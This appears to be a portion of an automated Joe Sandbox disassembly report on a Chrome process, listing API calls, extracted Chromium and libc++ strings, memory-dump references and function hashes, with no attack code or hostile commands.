                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\vector:1411: assertion __n < size() failed: vector[] index out of bounds$0Q$Blink.UseCounter$Histogram.BadConstructionArguments$Histogram.MismatchedConstructionArguments$Histogram.TooManyBuckets.1000$T
                                                    • API String ID: 1657474455-3477605054
                                                    • Opcode ID: fa6383063139e310abdf789931fe2ef95f983b2aa7c27c853c1179cf0b752dc1
                                                    • Instruction ID: cec0c05521afcc53e7f84c0057399808f517fccb8407410e6d2bb71d304464ab
                                                    • Opcode Fuzzy Hash: fa6383063139e310abdf789931fe2ef95f983b2aa7c27c853c1179cf0b752dc1
                                                    • Instruction Fuzzy Hash: FEF1D571A043449FCB11DF24D89163AF7E6EF88350F1A851DFA8AAB351DB31D845CBA1
                                                    Strings
                                                    • Histogram.MismatchedConstructionArguments, xrefs: 00DF1DD6
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00DF1D56
                                                    • ..\..\third_party\libc++\src\include\vector:1418: assertion __n < size() failed: vector[] index out of bounds, xrefs: 00DF1E1F
                                                    • Blink.UseCounter, xrefs: 00DF1D22
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00DF1D4F
                                                    • Histogram.TooManyBuckets.1000, xrefs: 00DF1D11
                                                    • T, xrefs: 00DF1CEF
                                                    • Histogram.BadConstructionArguments, xrefs: 00DF1DFC
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$..\..\third_party\libc++\src\include\vector:1418: assertion __n < size() failed: vector[] index out of bounds$Blink.UseCounter$Histogram.BadConstructionArguments$Histogram.MismatchedConstructionArguments$Histogram.TooManyBuckets.1000$T
                                                    • API String ID: 0-2072873490
                                                    • Opcode ID: 62312220ab03aeceb6d6eec92d833eb6884dcacae6e656c450405808de93a792
                                                    • Instruction ID: 281306ecc286e3a5011638ffcc430de3835dab5ef48ce6f760c758876d00aaea
                                                    • Opcode Fuzzy Hash: 62312220ab03aeceb6d6eec92d833eb6884dcacae6e656c450405808de93a792
                                                    • Instruction Fuzzy Hash: F7C16079A00209DFCB14DF65DC859BDB7B6EF88310F1A8029E916B7351EB31AD06CB61
                                                    APIs
                                                    • CreateFileMappingW.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00D326B9
                                                    • GetLastError.KERNEL32 ref: 00D326CA
                                                    • SetLastError.KERNEL32(00000000), ref: 00D326F6
                                                    • MapViewOfFile.KERNEL32(?,?,00000000,00000000,00000000), ref: 00D32754
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLast$CreateMappingView
                                                    • String ID: ..\..\base\files\memory_mapped_file_win.cc$GetHandleVerifier$MapFileRegionToMemory$MapImageToMemory$ScopedBlockingCall
                                                    • API String ID: 2231327692-1444722369
                                                    • Opcode ID: 62aaa49acbc55ba729e47bbdde459a288a352ad990ab1037d5c8226a23fa0aea
                                                    • Instruction ID: 67c5d67942aa560065f359ac376ecab30f0006aa131634feb73cae27b4bbd345
                                                    • Opcode Fuzzy Hash: 62aaa49acbc55ba729e47bbdde459a288a352ad990ab1037d5c8226a23fa0aea
                                                    • Instruction Fuzzy Hash: 43A1DFB1A043409FC714DF25C88573BB7E5FF89310F14892DF986AB291D7B0A949CBA2
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00DF2818,?), ref: 00DB280D
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00DF2818,?), ref: 00DB2985
                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00DF2818,?), ref: 00DB2BDF
                                                    • __floor_pentium4.LIBCMT ref: 00DB2CE3
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00DB2C98
                                                    • T, xrefs: 00DB2C34
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00DB2C84
                                                    • ), xrefs: 00DB2C70
                                                    • T, xrefs: 00DB2C61
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$Acquire$Release__floor_pentium4
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$T$T$)
                                                    • API String ID: 1376758062-1412603503
                                                    • Opcode ID: 155f2739da92dd79d9bc8392195bc98cae2a6ad170560646013128459c1b29be
                                                    • Instruction ID: 661fb8605f82bb1b25aa17c6b531ffaa9eecf4dc393145805d5cb86b720efe6f
                                                    • Opcode Fuzzy Hash: 155f2739da92dd79d9bc8392195bc98cae2a6ad170560646013128459c1b29be
                                                    • Instruction Fuzzy Hash: 24F17072A04609CFCB14DF69D4816BDB7F2FF89310B188629E847EB354D730A885CBA1
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00DF23D8,?,00D39152,?), ref: 00D391BB
                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00DF23D8,?,00D39152), ref: 00D391C5
                                                    • SetLastError.KERNEL32(?,?,?,000000FF,?,00000000), ref: 00D393FD
                                                    • OutputDebugStringA.KERNEL32(?,?,?,000000FF,?,00000000), ref: 00D394DB
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D3969E
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00D394A2
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D39694
                                                    • ..\..\third_party\libc++\src\include\string_view:330: assertion (__end - __begin) >= 0 failed: std::string_view::string_view(iterator, sentinel) received invalid range, xrefs: 00D394A9
                                                    • LOG_FATAL, xrefs: 00D396C7
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$DebugOutputString
                                                    • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$..\..\third_party\libc++\src\include\string_view:330: assertion (__end - __begin) >= 0 failed: std::string_view::string_view(iterator, sentinel) received invalid range$LOG_FATAL
                                                    • API String ID: 2831144795-1052261432
                                                    • Opcode ID: e87a74dc8d86b890f3c5bdf2d0c3adc7fc925d4a66a3f17cf6b080c78563ec09
                                                    • Instruction ID: 3cbbb6c165736c2e645faef796689fcc253dce2e96b17677d659700889c7149c
                                                    • Opcode Fuzzy Hash: e87a74dc8d86b890f3c5bdf2d0c3adc7fc925d4a66a3f17cf6b080c78563ec09
                                                    • Instruction Fuzzy Hash: 71E1D2B1E002159FDF10DFA4D8A1AAEF7B4EF44314F184169E815BB292D7B1AD06CBB1
                                                    Strings
                                                    • xr_compositing, xrefs: 00D4301A
                                                    • print_backend, xrefs: 00D43066
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D42FC1
                                                    • nacl-loader, xrefs: 00D431E7
                                                    • icon_reader, xrefs: 00D4304F
                                                    • service-sandbox-type, xrefs: 00D42E5C
                                                    • gpu-process, xrefs: 00D42F8C
                                                    • disable-gpu-sandbox, xrefs: 00D42FA4
                                                    • type, xrefs: 00D42DFC
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D42FBA
                                                    • screen_ai, xrefs: 00D43088
                                                    • no-sandbox, xrefs: 00D42DD8
                                                    • pdf_conversion, xrefs: 00D4302E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$disable-gpu-sandbox$gpu-process$icon_reader$nacl-loader$no-sandbox$pdf_conversion$print_backend$screen_ai$service-sandbox-type$type$xr_compositing
                                                    • API String ID: 0-1105528107
                                                    • Opcode ID: fb9973fb6e41a83601741ec99505111b9efe0f8b99de81c203b84b2d857ac04f
                                                    • Instruction ID: 5a021dff56122c73c6a106696eec2464cdc05a54421210172afc66c651f6edac
                                                    • Opcode Fuzzy Hash: fb9973fb6e41a83601741ec99505111b9efe0f8b99de81c203b84b2d857ac04f
                                                    • Instruction Fuzzy Hash: F8A18A319053529BD7008B3AE852B36B7B0EF45300F944737FD9A772D1EB249A9DD2A0
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00000000,?,00DB77EB,00000000,00000000), ref: 00DB2DDD
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,00DB77EB,00000000,00000000), ref: 00DB3059
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,00DB77EB,00000000,00000000), ref: 00DB30A9
                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,00DB77EB,00000000,00000000), ref: 00DB30D3
                                                    • __floor_pentium4.LIBCMT ref: 00DB310E
                                                    • __floor_pentium4.LIBCMT ref: 00DB3412
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00DB33A1
                                                    • T, xrefs: 00DB337B
                                                    • T, xrefs: 00DB334D
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease__floor_pentium4
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$T$T
                                                    • API String ID: 1764334464-272858712
                                                    • Opcode ID: 538a69099d9c66ba128c783937a1cca5c82332237c95f40d8103d2216fd5c7f1
                                                    • Instruction ID: 8872561dd43914e9e7c77f6e1e1665cecfcca202eac2b2570fb2d5820acbe45b
                                                    • Opcode Fuzzy Hash: 538a69099d9c66ba128c783937a1cca5c82332237c95f40d8103d2216fd5c7f1
                                                    • Instruction Fuzzy Hash: F422B171B00615CFCB18DF69C8812BEB7F2BF88310B198629E947EB314D731E9459BA0
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00000000), ref: 00DBC98D
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00DBCA68
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DBCAB6
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,00000021,?,00004000,?,000000FF), ref: 00DBCBF3
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00000000), ref: 00DBCC2C
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,00000010,?,00004000,FFFFFFFF,00000000), ref: 00DBCCDE
                                                      • Part of subcall function 00D3D400: TlsSetValue.KERNEL32(00000000,00000000,00000348,00000000,00000000,00000000,?,?,00D3D91D), ref: 00D3D485
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease$Value
                                                    • String ID: first$second
                                                    • API String ID: 3402380315-3095674784
                                                    • Opcode ID: 411384b878fc12a1d3e8c9ca752f0c72f5015ec1817dd94a6ad2967a164cb33d
                                                    • Instruction ID: 9982bfa098d68972d1b053cca7c31cfee36e3d3083cc9701c01e582ee7f722cd
                                                    • Opcode Fuzzy Hash: 411384b878fc12a1d3e8c9ca752f0c72f5015ec1817dd94a6ad2967a164cb33d
                                                    • Instruction Fuzzy Hash: FA32CF75614741DFD708CF29C880A6ABBE2FFC8314F18866DF59A9B291D730E845CBA1
                                                    APIs
                                                      • Part of subcall function 00D32130: GetCurrentThreadId.KERNEL32 ref: 00D32145
                                                      • Part of subcall function 00D32130: TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,00D31E30,?,?,00D31FBD,00D31E30,?,?,00D31E30), ref: 00D3214F
                                                    • GetCurrentThread.KERNEL32 ref: 00D32026
                                                    • IsDebuggerPresent.KERNEL32(00D31E30,?,?,00D31E30,?), ref: 00D3204E
                                                    • GetModuleHandleW.KERNEL32(Kernel32.dll,00D31E30,?,?,00D31E30,?), ref: 00D3208D
                                                    • GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 00D32099
                                                    • GetCurrentThreadId.KERNEL32 ref: 00D32105
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D320EC
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D320E5
                                                    • Kernel32.dll, xrefs: 00D32088
                                                    • SetThreadDescription, xrefs: 00D32093
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CurrentThread$AcquireAddressDebuggerExclusiveHandleLockModulePresentProc
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$Kernel32.dll$SetThreadDescription
                                                    • API String ID: 2807427228-2817593401
                                                    • Opcode ID: 6dcfaa94168b302442e328181bb7a0930e399905b3cd8f23a9a09987f7511630
                                                    • Instruction ID: 1835db30033a02f22ec968dd6252452803f8e11e1f89dc2ef62f290a4debb93a
                                                    • Opcode Fuzzy Hash: 6dcfaa94168b302442e328181bb7a0930e399905b3cd8f23a9a09987f7511630
                                                    • Instruction Fuzzy Hash: 0E411AB1E003159FDB149B25EC46A3E77A4EB44B50F094025F915BB392D732BC09CBB2
                                                    APIs
                                                    Strings
                                                    • %s: option `%s' is ambiguous (could be `--%s' or `--%s'), xrefs: 00D66943
                                                    • POSIXLY_CORRECT, xrefs: 00D66575
                                                    • -%c', xrefs: 00D669FE
                                                    • %s: argument required for option `, xrefs: 00D669DC
                                                    • %s: invalid option -- `-%c', xrefs: 00D66AAD
                                                    • --%s', xrefs: 00D66A1C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: %s: argument required for option `$%s: invalid option -- `-%c'$%s: option `%s' is ambiguous (could be `--%s' or `--%s')$-%c'$--%s'$POSIXLY_CORRECT
                                                    • API String ID: 4218353326-3002513585
                                                    • Opcode ID: 0bd09395353c4d9424e72295c4af4a936e71453f9317f714bf71a5cb9b1b5582
                                                    • Instruction ID: c0041e63dee737cfa01ad5bd2006bb86a4369a526dcc432fa9d8d4e06c7055e5
                                                    • Opcode Fuzzy Hash: 0bd09395353c4d9424e72295c4af4a936e71453f9317f714bf71a5cb9b1b5582
                                                    • Instruction Fuzzy Hash: 9302D1B1E002198FDB14CF69D885BBAB7F5FB49308F18406AE846A7351DB34ED45CBA1
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D7F8E6
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D7F8DF
                                                    • T, xrefs: 00D7F8AA
                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00D7F8D8
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$T
                                                    • API String ID: 0-2907504972
                                                    • Opcode ID: bd9d0a969054460362db4b7121c980827aafd48d46439da17c3add66e0b65c82
                                                    • Instruction ID: 81b52431f133af4a31f10183e1834b31d18591a94c5df6fc2d616dcbe43a44ae
                                                    • Opcode Fuzzy Hash: bd9d0a969054460362db4b7121c980827aafd48d46439da17c3add66e0b65c82
                                                    • Instruction Fuzzy Hash: 16D1A6B0A007019FD724DF29D885626B7E1FF45304F18857DE88A9B362F771E855CBA2
                                                    APIs
